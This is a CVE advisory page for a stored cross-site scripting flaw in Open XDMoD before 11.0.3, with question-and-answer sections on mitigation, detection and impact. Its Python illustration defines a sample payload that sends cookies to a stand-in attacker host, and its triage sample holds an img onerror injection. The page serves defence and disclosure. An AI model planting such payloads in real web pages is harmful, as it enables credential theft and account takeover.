CVE-2026-45778
Undergoing Analysis - In Progress
Stored XSS in OpenXDMoD User Profile

Publication date: 2026-06-05

Last updated on: 2026-06-05

Assigner: GitHub, Inc.

Description
OpenXDMoD is an open framework for collecting and analyzing HPC metrics. Prior to version 11.0.3, an authenticated attacker can inject malicious JavaScript into their Open XDMoD user profile and abuse the password reset functionality to email a link to an HTML page, which when visited by the victim, reflects and executes the unsanitized payload in the victim's browser, potentially leading to credential capture and Open XDMoD account takeover. All deployments of Open XDMoD prior to 11.0.3 are impacted. This issue was reported privately on 2026-04-06, and at this time there is no evidence that this vulnerability has been exploited in the wild. The vulnerability was patched in Open XDMoD 11.0.3 on 2026-05-12. As a workaround, apply the patch manually.
Meta Information
Published
2026-06-05
Last Modified
2026-06-05
Generated
2026-06-06
AI Q&A
2026-06-05
EPSS Evaluated
N/A
NVD
Affected Vendors & Products
Showing 2 associated CPEs
Vendor      Product       Version / Range
openxdmod   openxdmod     < 11.0.3 (11.0.3 itself excluded)
ubccr       open_xdmod    < 11.0.3 (11.0.3 itself excluded)
CWE
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Powered Q&A
What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, immediately upgrade Open XDMoD to version 11.0.3 or later, where the issue has been patched.

If upgrading is not possible right away, apply the provided manual patch as a temporary workaround to fix the vulnerability.


Can you explain this vulnerability to me?

CVE-2026-45778 is a stored cross-site scripting (XSS, CWE-79) vulnerability in Open XDMoD versions prior to 11.0.3: JavaScript saved in a user profile field is later rendered unescaped by a page reached through the password reset functionality.

An authenticated attacker first stores the malicious JavaScript in their own Open XDMoD user profile and then abuses the password reset feature to email a victim a link to the page that renders that profile data.

When the victim opens the link, the page reflects the stored payload into its HTML without neutralising it, so the script runs in the victim's browser in the context of the Open XDMoD site, which can be used to capture credentials and take over the victim's account.
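The following is an added illustration, not code from Open XDMoD or from the advisory: a minimal Python model of the defect, with a page that interpolates a stored profile field straight into HTML beside the hardened version that escapes it for an HTML text context. The function names, the page layout and the payload are assumptions made for the example.

```python
import html

# Constructed attacker payload of the kind an authenticated user could store in a
# profile field; it is invented for this example, not taken from the advisory.
PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_reset_page_vulnerable(display_name: str) -> str:
    """Interpolates the stored profile value directly into HTML (CWE-79)."""
    return (
        "<html><body>"
        f"<p>Password reset requested by {display_name}</p>"
        "</body></html>"
    )


def render_reset_page_fixed(display_name: str) -> str:
    """Escapes the stored value for an HTML text context before interpolation."""
    safe = html.escape(display_name, quote=True)  # < > & " ' become entities
    return (
        "<html><body>"
        f"<p>Password reset requested by {safe}</p>"
        "</body></html>"
    )


def contains_live_script(page: str) -> bool:
    """Crude check: does the rendered page still contain an unescaped <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(contains_live_script(render_reset_page_vulnerable(PAYLOAD)))  # True
    print(contains_live_script(render_reset_page_fixed(PAYLOAD)))       # False
```

html.escape is the right tool only for HTML element content and quoted attribute values; a value that ends up inside a JavaScript block, a URL or an unquoted attribute needs the encoding for that context instead, so the fix in a real code base is to escape at the template output point for each context rather than to filter the stored value once.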


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability involves an authenticated attacker storing malicious JavaScript in their Open XDMoD user profile and then using the password reset functionality to mail the victim a link to a page that renders that stored profile data. Detection therefore centres on two things: confirming the installed version, and looking for markup in stored profile fields.

Because the payload lives in the attacker's profile rather than in the link itself, the password reset email can look entirely legitimate, so inspecting outgoing reset mail for embedded JavaScript may not catch it. Unexpected reset requests aimed at administrators or other privileged users are still worth reviewing, since the attacker has to trigger a reset email to deliver the link.

On the system side, checking the Open XDMoD version determines whether the installation is vulnerable (versions prior to 11.0.3 are affected).

  • Check the Open XDMoD version: any release prior to 11.0.3 is vulnerable.
  • On RPM-based installs, `rpm -q xdmod` reports the installed package version; otherwise check the version shown in the application UI or in the installation directory.
  • Review the profile fields of all user accounts for HTML tags, `javascript:` URLs or event-handler attributes, since that is where the payload is stored.
  • Review password reset request logs and outgoing reset emails for resets initiated against accounts that did not ask for them.

No specific detection commands or scripts are provided in the available resources.
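Since the page provides no detection script, the following added Python triage helper (written for this page, not supplied by the Open XDMoD project) does the two checks above: it parses a version string such as the output of `rpm -q xdmod` and compares it with 11.0.3, and it scans profile records for markup that has no place in a plain-text field. The sample profile rows, their column names and the `triage` function name are constructed for the example.

```python
import re

# First fixed release according to the advisory.
FIXED_VERSION = (11, 0, 3)

# Markers that have no business in a plain-text profile field such as a name:
# an HTML tag opener, a javascript: URL, or an on*= event-handler attribute.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)


def parse_version(text: str) -> tuple:
    """Extract the first x.y.z version from strings such as '11.0.2' or
    'xdmod-11.0.3-1.0.el8.noarch' (RPM package name format) as an int tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_vulnerable(version_text: str) -> bool:
    """True for any Open XDMoD release older than 11.0.3."""
    return parse_version(version_text) < FIXED_VERSION


def suspicious_fields(record: dict) -> list:
    """Names of the string fields in one profile record that contain markup."""
    return [k for k, v in record.items() if isinstance(v, str) and MARKUP_RE.search(v)]


def triage(profiles: list) -> dict:
    """Map username -> flagged fields for every record that has at least one hit."""
    out = {}
    for p in profiles:
        hits = suspicious_fields(p)
        if hits:
            out[p["username"]] = hits
    return out


# Constructed sample rows standing in for a dump of the XDMoD user table; the
# column names and values are invented for this example, not real data.
SAMPLE_PROFILES = [
    {"username": "alice", "first_name": "Alice", "last_name": "Lee",
     "email": "alice@hpc.example"},
    {"username": "mallory", "first_name": "<img src=x onerror=alert(1)>",
     "last_name": "M", "email": "mallory@hpc.example"},
    {"username": "bob", "first_name": "Bob", "last_name": "O'Brien",
     "email": "bob@hpc.example"},
]

if __name__ == "__main__":
    for v in ("11.0.2", "11.0.3", "xdmod-11.1.0-1.0.el8.noarch"):
        print(v, "vulnerable" if is_vulnerable(v) else "patched")
    print(triage(SAMPLE_PROFILES))  # {'mallory': ['first_name']}
```

The regular expression is a triage heuristic, not a parser: it will flag a legitimate name containing a literal `<` followed by a letter, so treat hits as candidates for manual review rather than as proof of compromise, and remember that a clean scan only says the payload is not present now, not that the installation is patched.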


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability in Open XDMoD allows an authenticated attacker to inject malicious JavaScript that can lead to credential theft and account takeover. This impacts the confidentiality and integrity of user data.

Such a compromise of user credentials and potential unauthorized access to accounts could lead to violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access.

Therefore, if exploited, this vulnerability could negatively affect compliance with these common standards by exposing sensitive user data and failing to maintain adequate security controls.


How can this vulnerability impact me? :

This vulnerability can lead to the compromise of your Open XDMoD account through credential capture.

An attacker can take over your account by tricking you into clicking a malicious link that executes injected JavaScript in your browser.

The impact is primarily to the confidentiality and integrity of your account data; the advisory describes no direct effect on system availability.

